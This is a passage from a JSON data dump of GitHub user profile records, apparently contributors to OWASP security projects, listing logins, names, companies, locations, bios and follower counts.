"Christian Treutler", + "login": "christiantreutler-avi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29118983?v=4", + "company": "AviNetworks (now part of VMware)", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-06-01T09:26:57Z", + "updated_at": "2024-07-16T12:56:18Z", + "node_id": "MDQ6VXNlcjI5MTE4OTgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2813, + "fields": { + "nest_created_at": "2024-09-12T02:26:51.331Z", + "nest_updated_at": "2024-09-22T18:39:17.730Z", + "name": "Mirko Dziadzka", + "login": "MirkoDziadzka", + "email": "mirko.dziadzka@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1268043?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 17, + "public_gists_count": 8, + "public_repositories_count": 31, + "created_at": "2011-12-16T15:16:02Z", + "updated_at": "2024-09-18T13:57:35Z", + "node_id": "MDQ6VXNlcjEyNjgwNDM=", + "bio": "Old school Unix guy, currently interested in software development, Python, Go, C++, Swift, cluster, security ...\r\n\r\nSee @mirkodziadzka-avi for my work account", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2814, + "fields": { + "nest_created_at": "2024-09-12T02:26:52.612Z", + "nest_updated_at": "2024-09-22T19:48:40.024Z", + "name": "Syin Wu", + "login": "syinwu", + "email": "bxlxx.wu@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34093828?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2017-11-29T11:04:24Z", + "updated_at": "2024-08-15T01:13:43Z", + "node_id": "MDQ6VXNlcjM0MDkzODI4", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2815, + "fields": { + "nest_created_at": "2024-09-12T02:26:53.884Z", + "nest_updated_at": "2024-09-12T02:26:53.884Z", + "name": "Kelson Vibber", + "login": "kvibber", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6667023?v=4", + "company": "", + "location": "Los Angeles", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-02-13T00:18:05Z", + "updated_at": "2024-08-05T02:38:17Z", + "node_id": "MDQ6VXNlcjY2NjcwMjM=", + "bio": "Techie, software developer, hobbyist photographer, sci-fi/fantasy and comics fan.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2816, + "fields": { + "nest_created_at": "2024-09-12T02:27:08.817Z", + "nest_updated_at": "2024-09-22T19:48:32.673Z", + "name": "", + "login": "superlgn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4230860?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-04-23T03:26:17Z", + "updated_at": "2024-01-17T22:49:33Z", + "node_id": "MDQ6VXNlcjQyMzA4NjA=", + "bio": "In the woods. I was walking ... for Bigfoot, looking ... and then aliens beamed me up.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2817, + "fields": { + "nest_created_at": "2024-09-12T02:27:17.377Z", + "nest_updated_at": "2024-09-16T22:32:39.517Z", + "name": "Armin Abfalterer", + "login": "arminabf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3939810?v=4", + "company": "United Security Providers", + "location": "Zurich", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2013-03-22T09:35:23Z", + "updated_at": "2024-08-26T09:26:44Z", + "node_id": "MDQ6VXNlcjM5Mzk4MTA=", + "bio": "Cyber Defence Engineer/Architect with a commitment to developing robust security solutions and enabling customers to navigate the evolving threat landscape", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2818, + "fields": { + "nest_created_at": "2024-09-12T02:27:19.026Z", + "nest_updated_at": "2024-09-12T02:27:19.026Z", + "name": "Niklas Weimann", + "login": "niklasweimann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12865466?v=4", + "company": "@lapid-service-gmbh", + "location": "Germany", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2015-06-12T20:03:15Z", + "updated_at": "2024-09-06T16:08:36Z", + "node_id": "MDQ6VXNlcjEyODY1NDY2", + "bio": "C# & .net | Backend Developer and DevOps @LapID_Service | #workhardanywhere", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2819, + "fields": { + "nest_created_at": "2024-09-12T02:27:21.428Z", + "nest_updated_at": "2024-09-12T02:27:21.428Z", + "name": "Tim van Dijen", + "login": "tvdijen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/841045?v=4", + "company": "SSC-ICT", + "location": "Pijnacker, Netherlands", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 18, + "public_gists_count": 4, + "public_repositories_count": 58, + "created_at": "2011-06-09T22:31:26Z", + "updated_at": "2024-08-29T05:49:18Z", + "node_id": "MDQ6VXNlcjg0MTA0NQ==", + "bio": "Application specialist, mostly working with open-source (federated) authentication platforms.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2820, + "fields": { + "nest_created_at": "2024-09-12T02:27:22.651Z", + "nest_updated_at": "2024-09-12T02:27:22.651Z", + "name": "Vivek Panchal", + "login": "Vivekmauli14", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83024029?v=4", + "company": "Veritawall Technologies", + "location": "Gurugram", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2021-04-22T15:07:13Z", + "updated_at": "2024-08-08T12:46:40Z", + "node_id": "MDQ6VXNlcjgzMDI0MDI5", + "bio": "Software Developer and a problem solving enthusiast working in cybersecurity domain. I have completed my graduation in Electronics and Telecommunication.", + "is_hireable": false, + "twitter_username": "viveksp20000" + } +}, +{ + "model": "github.user", + "pk": 2821, + "fields": { + "nest_created_at": "2024-09-12T02:27:23.878Z", + "nest_updated_at": "2024-09-16T22:32:41.419Z", + "name": "Oleksandr Isniuk", + "login": "isniukArte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111287421?v=4", + "company": "", + "location": "Lviv, Ukraine", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-08-15T12:31:37Z", + "updated_at": "2023-08-30T17:14:17Z", + "node_id": "U_kgDOBqIcfQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2822, + "fields": { + "nest_created_at": "2024-09-12T02:27:25.519Z", + "nest_updated_at": "2024-09-22T10:34:47.170Z", + "name": "", + "login": "louis07r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61292384?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-02-20T19:19:43Z", + "updated_at": "2024-07-22T07:03:31Z", + "node_id": "MDQ6VXNlcjYxMjkyMzg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2823, + "fields": { + "nest_created_at": "2024-09-12T02:27:31.716Z", + "nest_updated_at": "2024-09-22T19:48:46.242Z", + "name": "", + "login": "aryehb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49538279?v=4", + "company": "accept.blue", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2019-04-11T22:07:28Z", + "updated_at": "2024-07-23T18:56:01Z", + "node_id": "MDQ6VXNlcjQ5NTM4Mjc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2824, + "fields": { + "nest_created_at": "2024-09-12T02:27:32.966Z", + "nest_updated_at": "2024-09-22T10:34:48.190Z", + "name": "Dan Ran", + "login": "Danrancan", + "email": "dan@danran.rocks", + "avatar_url": "https://avatars.githubusercontent.com/u/30222551?v=4", + "company": "danran.rocks", + "location": "Milwaukee, WI", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2017-07-17T02:35:34Z", + "updated_at": "2024-08-31T03:38:32Z", + "node_id": "MDQ6VXNlcjMwMjIyNTUx", + "bio": "Accountant/DJ/Nerd/Apple Fanboy/Tinkerer/Event Producer/Operating System Enthusiast and explorer, Writer & Blogger @nerd-tech & www.danran.rocks", + "is_hireable": true, + "twitter_username": "DanRanOfficial" + } +}, +{ + "model": "github.user", + "pk": 2825, + "fields": { + "nest_created_at": "2024-09-12T02:27:34.245Z", + "nest_updated_at": "2024-09-16T22:32:42.750Z", + "name": "", + "login": "netcedec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150895654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-15T07:44:09Z", + "updated_at": "2024-06-22T14:41:09Z", + "node_id": "U_kgDOCP58Jg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2826, + "fields": { + "nest_created_at": "2024-09-12T02:27:39.274Z", + "nest_updated_at": "2024-09-12T02:27:39.274Z", + "name": "Puvipavan", + "login": "Puvipavan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14966528?v=4", + "company": "", + "location": "Trincomalee, Sri Lanka", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2015-10-04T17:48:49Z", + "updated_at": "2024-08-09T11:49:54Z", + "node_id": "MDQ6VXNlcjE0OTY2NTI4", + "bio": "F1nD1nG Th3 An5w3r5 0f S3cR3t5", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2827, + "fields": { + "nest_created_at": "2024-09-12T02:28:06.433Z", + "nest_updated_at": "2024-09-12T02:28:06.433Z", + "name": "Captain T", + "login": "Captainzalad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64754753?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-05-03T21:47:49Z", + "updated_at": "2021-12-21T22:39:02Z", + "node_id": "MDQ6VXNlcjY0NzU0NzUz", + "bio": "Just another free Repo", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2828, + "fields": { + "nest_created_at": "2024-09-12T02:28:09.898Z", + "nest_updated_at": "2024-09-22T19:49:04.394Z", + "name": "Taavi Ansper", + "login": "TafkaMax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46354923?v=4", + "company": "", + "location": "Estonia", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2019-01-03T18:00:44Z", + "updated_at": "2024-09-04T00:07:09Z", + "node_id": "MDQ6VXNlcjQ2MzU0OTIz", + "bio": "Just a programmer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2829, + "fields": { + "nest_created_at": "2024-09-12T02:28:11.564Z", + "nest_updated_at": "2024-09-12T02:28:11.564Z", + "name": "", + "login": "enibache", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26222534?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-03-06T12:08:46Z", + "updated_at": "2023-11-22T17:13:56Z", + "node_id": "MDQ6VXNlcjI2MjIyNTM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2830, + "fields": { + "nest_created_at": "2024-09-12T02:28:15.790Z", + "nest_updated_at": "2024-09-12T02:28:15.790Z", + "name": "Daniel D'Angeli", + "login": "xBounceIT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35002896?v=4", + "company": "Sync Security S.r.l.", + "location": "Rome, Italy", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-01-01T14:12:56Z", + "updated_at": "2024-09-04T14:29:32Z", + "node_id": "MDQ6VXNlcjM1MDAyODk2", + "bio": "Cyber Security Analyst / Junior Programmer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2831, + "fields": { + "nest_created_at": "2024-09-12T02:28:22.994Z", + "nest_updated_at": "2024-09-22T20:28:25.129Z", + "name": "Doukkalli", + "login": "aramrami", + "email": "azzeddine.ramrami@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/225552?v=4", + "company": "@Accenture Security", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 31, + "public_gists_count": 4, + "public_repositories_count": 563, + "created_at": "2010-03-18T18:21:17Z", + "updated_at": "2024-08-31T16:38:39Z", + "node_id": "MDQ6VXNlcjIyNTU1Mg==", + "bio": "Accenture Security, Senior Security Manager and Security Architect\r\nOT/IoT Security, SCADA/ICS, NextGen SOC, AppSec, DevSecOPS, Hardware Security SME ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2832, + "fields": { + "nest_created_at": "2024-09-12T02:28:32.167Z", + "nest_updated_at": "2024-09-22T20:22:40.542Z", + "name": "", + "login": "dp-anto", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72495351?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-10-07T09:11:55Z", + "updated_at": "2022-09-06T20:04:10Z", + "node_id": "MDQ6VXNlcjcyNDk1MzUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2833, + "fields": { + "nest_created_at": "2024-09-12T02:28:36.306Z", + "nest_updated_at": "2024-09-22T20:23:31.838Z", + "name": "Jake Karnes", + "login": "jakekarnes42", + "email": "jake.karnes@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3769323?v=4", + "company": "NetSPI", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 23, + "public_gists_count": 13, + "public_repositories_count": 13, + "created_at": "2013-03-04T21:39:33Z", + "updated_at": "2024-07-11T18:13:00Z", + "node_id": "MDQ6VXNlcjM3NjkzMjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2834, + "fields": { + "nest_created_at": "2024-09-12T02:28:39.169Z", + "nest_updated_at": "2024-09-22T20:23:42.064Z", + "name": "OWASP WebGoat", + "login": "WebGoat", + "email": "webgoat@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/7718244?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 170, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-05-27T22:16:44Z", + "updated_at": "2023-03-24T17:34:41Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjc3MTgyNDQ=", + "bio": "Deliberately insecure JavaEE application to teach application security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2835, + "fields": { + "nest_created_at": "2024-09-12T02:28:45.038Z", + "nest_updated_at": "2024-09-12T02:28:45.038Z", + "name": "", + "login": "ChanduMeenavalli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22357524?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-09-21T22:48:17Z", + "updated_at": "2020-08-19T19:14:40Z", + "node_id": "MDQ6VXNlcjIyMzU3NTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2836, + "fields": { + "nest_created_at": "2024-09-12T02:28:47.503Z", + "nest_updated_at": "2024-09-12T02:28:47.503Z", + "name": "Nicolai Nielsen", + "login": "dovecode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16987409?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-01-31T15:12:48Z", + "updated_at": "2024-09-12T00:30:13Z", + "node_id": "MDQ6VXNlcjE2OTg3NDA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2837, + "fields": { + "nest_created_at": "2024-09-12T02:28:51.705Z", + "nest_updated_at": "2024-09-22T20:23:48.131Z", + "name": "Àngel Ollé Blázquez", + "login": "aolle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12197954?v=4", + "company": "", + "location": "Barcelona, Spain", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 30, + "public_gists_count": 22, + "public_repositories_count": 22, + "created_at": "2015-05-01T11:11:04Z", + "updated_at": "2024-08-29T10:06:16Z", + "node_id": "MDQ6VXNlcjEyMTk3OTU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2838, + "fields": { + "nest_created_at": "2024-09-12T02:29:00.981Z", + "nest_updated_at": "2024-09-12T02:29:00.981Z", + "name": "Yandrew", + "login": "allblueee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95740379?v=4", + "company": "", + "location": "laughtale", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2021-12-08T07:23:20Z", + "updated_at": "2024-09-08T07:09:31Z", + "node_id": "U_kgDOBbTh2w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2839, + "fields": { + "nest_created_at": "2024-09-12T02:29:12.768Z", + "nest_updated_at": "2024-09-12T02:29:12.768Z", + "name": "DoI", + "login": "denandz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5291556?v=4", + "company": "", + "location": "Auckland, New Zealand", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 176, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2013-08-23T02:37:21Z", + "updated_at": "2024-06-01T05:34:04Z", + "node_id": "MDQ6VXNlcjUyOTE1NTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2840, + "fields": { + "nest_created_at": "2024-09-12T02:29:13.583Z", + "nest_updated_at": "2024-09-12T02:29:13.583Z", + "name": "", + "login": "shiva-art", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71481826?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2020-09-18T04:31:45Z", + "updated_at": "2024-08-28T06:16:12Z", + "node_id": "MDQ6VXNlcjcxNDgxODI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2841, + "fields": { + "nest_created_at": "2024-09-12T02:29:13.988Z", + "nest_updated_at": "2024-09-22T20:23:47.112Z", + "name": "René Zubcevic", + "login": "zubcevic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7931455?v=4", + "company": "Zubcevic.com IT consultancy & engineering", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2014-06-19T08:21:22Z", + "updated_at": "2024-05-28T15:58:18Z", + "node_id": "MDQ6VXNlcjc5MzE0NTU=", + "bio": "Freelance IT solution engineer and allround expert on application development, information security, deployment automation and performance tuning", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2842, + "fields": { + "nest_created_at": "2024-09-12T02:29:15.218Z", + "nest_updated_at": "2024-09-12T02:29:15.218Z", + "name": "Tsugumi", + "login": "NightfoxHS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10007368?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-11-30T06:56:00Z", + "updated_at": "2024-03-09T02:54:08Z", + "node_id": "MDQ6VXNlcjEwMDA3MzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2843, + "fields": { + "nest_created_at": "2024-09-12T02:29:16.024Z", + "nest_updated_at": "2024-09-12T02:29:16.024Z", + "name": "", + "login": "awesoemgaming", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129987735?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2023-04-05T17:47:27Z", + "updated_at": "2024-06-27T02:51:29Z", + "node_id": "U_kgDOB790lw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2844, + "fields": { + "nest_created_at": "2024-09-12T02:29:17.793Z", + "nest_updated_at": "2024-09-12T02:29:17.793Z", + "name": "Location", + "login": "James-Lu-none", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59411633?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2020-01-01T11:55:32Z", + "updated_at": "2024-09-11T04:30:31Z", + "node_id": "MDQ6VXNlcjU5NDExNjMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2845, + "fields": { + "nest_created_at": "2024-09-12T02:29:21.664Z", + "nest_updated_at": "2024-09-12T02:29:21.664Z", + "name": "", + "login": "joonhwa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10021536?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2014-12-01T08:08:14Z", + "updated_at": "2024-07-25T01:41:56Z", + "node_id": "MDQ6VXNlcjEwMDIxNTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2846, + "fields": { + "nest_created_at": "2024-09-12T02:29:23.643Z", + "nest_updated_at": "2024-09-12T02:29:23.643Z", + "name": "Mithun Vaidhyanathan", + "login": "earthling1984", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19665196?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-05-31T10:03:56Z", + "updated_at": "2024-07-23T16:37:30Z", + "node_id": "MDQ6VXNlcjE5NjY1MTk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2847, + "fields": { + "nest_created_at": "2024-09-12T02:29:27.432Z", + "nest_updated_at": "2024-09-12T02:29:27.432Z", + "name": "", + "login": "nosed07", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72928905?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-15T13:51:56Z", + "updated_at": "2024-08-17T16:41:19Z", + "node_id": "MDQ6VXNlcjcyOTI4OTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2848, + "fields": { + "nest_created_at": "2024-09-12T02:29:28.246Z", + "nest_updated_at": "2024-09-22T20:23:44.608Z", + "name": "Adrien {Adaute}", + "login": "adaute", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13275059?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-07-10T14:08:18Z", + "updated_at": "2023-09-09T20:11:49Z", + "node_id": "MDQ6VXNlcjEzMjc1MDU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2849, + "fields": { + "nest_created_at": "2024-09-12T02:29:36.433Z", + "nest_updated_at": "2024-09-22T20:24:11.092Z", + "name": "", + "login": "webgoat-github", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32959481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-10-20T13:14:09Z", + "updated_at": "2021-03-30T10:29:59Z", + "node_id": "MDQ6VXNlcjMyOTU5NDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2850, + "fields": { + "nest_created_at": "2024-09-12T02:29:37.267Z", + "nest_updated_at": "2024-09-22T20:26:06.080Z", + "name": "Doug Morato", + "login": "dougmorato", + "email": "dm@corp.io", + "avatar_url": "https://avatars.githubusercontent.com/u/9654?v=4", + "company": "@cybernetikco ", + "location": "Boca Raton, FL - USA", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 94, + "public_gists_count": 16, + "public_repositories_count": 67, + "created_at": "2008-05-08T03:25:04Z", + "updated_at": "2024-08-12T18:38:06Z", + "node_id": "MDQ6VXNlcjk2NTQ=", + "bio": "Beloved Son of Heavenly Father, Happily Married & In Love, Father of 3, 🇧🇷🇺🇸\r\nPassionate about life. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2851, + "fields": { + "nest_created_at": "2024-09-12T02:29:51.526Z", + "nest_updated_at": "2024-09-22T20:26:13.527Z", + "name": "OWASP OWTF", + "login": "owtf", + "email": "owasp_owtf_developers@lists.owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1230211?v=4", + "company": "", + "location": "Pwnageland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 33, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2011-11-30T08:25:21Z", + "updated_at": "2018-03-26T17:16:12Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjEyMzAyMTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2852, + "fields": { + "nest_created_at": "2024-09-12T02:29:55.143Z", + "nest_updated_at": "2024-09-22T20:25:56.355Z", + "name": "Abraham Aranguren", + "login": "7a", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1230243?v=4", + "company": "7ASecurity", + "location": "Bromberg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 60, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2011-11-30T08:45:55Z", + "updated_at": "2024-08-26T17:19:31Z", + "node_id": "MDQ6VXNlcjEyMzAyNDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2853, + "fields": { + "nest_created_at": "2024-09-12T02:29:56.768Z", + "nest_updated_at": "2024-09-22T20:26:17.125Z", + "name": "Viyat", + "login": "viyatb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4557897?v=4", + "company": "@owtf ", + "location": "/dev/null", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 83, + "public_gists_count": 58, + "public_repositories_count": 11, + "created_at": "2013-05-29T08:41:34Z", + "updated_at": "2024-09-10T17:12:14Z", + "node_id": "MDQ6VXNlcjQ1NTc4OTc=", + "bio": "Project co-lead @owtf", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2854, + "fields": { + "nest_created_at": "2024-09-12T02:29:58.430Z", + "nest_updated_at": "2024-09-22T20:26:04.140Z", + "name": "Anant Shrivastava", + "login": "anantshri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/236843?v=4", + "company": "InfoSec Professional", + "location": "Bhopal India", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 430, + "public_gists_count": 19, + "public_repositories_count": 41, + "created_at": "2010-04-04T20:17:30Z", + "updated_at": "2024-08-19T13:09:19Z", + "node_id": "MDQ6VXNlcjIzNjg0Mw==", + "bio": "Project Leader for @TamerPlatform and @CodeVigilant ", + "is_hireable": false, + "twitter_username": "anantshri" + } +}, +{ + "model": "github.user", + "pk": 2855, + "fields": { + "nest_created_at": "2024-09-12T02:30:26.305Z", + "nest_updated_at": "2024-09-22T19:48:31.103Z", + "name": "jose nazario", + "login": "paralax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5619153?v=4", + "company": "", + "location": "ann arbor, mi", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 668, + "public_gists_count": 65, + "public_repositories_count": 325, + "created_at": "2013-10-05T18:54:01Z", + "updated_at": "2024-09-21T21:44:13Z", + "node_id": "MDQ6VXNlcjU2MTkxNTM=", + "bio": "cybersecurity, threat intel, cooking, biochemistry.", + "is_hireable": true, + "twitter_username": "jnazario" + } +}, +{ + "model": "github.user", + "pk": 2856, + "fields": { + "nest_created_at": 